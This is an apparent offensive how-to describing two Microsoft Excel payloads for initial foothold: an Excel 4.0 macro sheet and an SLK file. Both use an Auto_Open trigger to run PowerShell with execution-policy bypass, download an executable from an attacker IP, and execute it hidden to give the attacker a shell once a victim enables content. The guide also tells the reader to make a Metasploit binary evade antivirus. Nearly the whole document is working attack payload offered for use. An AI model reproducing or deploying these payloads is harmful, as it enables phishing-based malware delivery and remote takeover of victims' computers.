Microsoft Excel Payload for initial foothold is old method but still widely used by APTs.

Microsoft Excel 4.0 Macro Payload

Right click on the workbook and click insert

image-20220406220922322

Select MS Excel 4.0 Macro

image-20220402015227344

paste following payload:

=EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe")
=WAIT(NOW()+"00:00:10")
=EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe")
=HALT()

Now Select first cell and rename it to Auto_Open

image-20220406221227512

Save as Excel 97-2003 Workbook(XLS)

When victim Enable Content We get shell

Microsoft Excel SLK Payload

Generate binary using metasploit. Make sure make it bypass AV.

Open Notepad and paste:

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.88.168:8000/20.exe -outfile c:\users\public\20.exe")
C;X1;Y102;K0;EWAIT(NOW()+"00:00:10")
C;X1;Y103;K0;EEXEC("powershell.exe c:\users\public\20.exe")
C;X1;Y104;K0;EHALT()
E

And Save ask Test.slk

When victim double click and Enable Content It downloads the binary and execute, as a result we get shell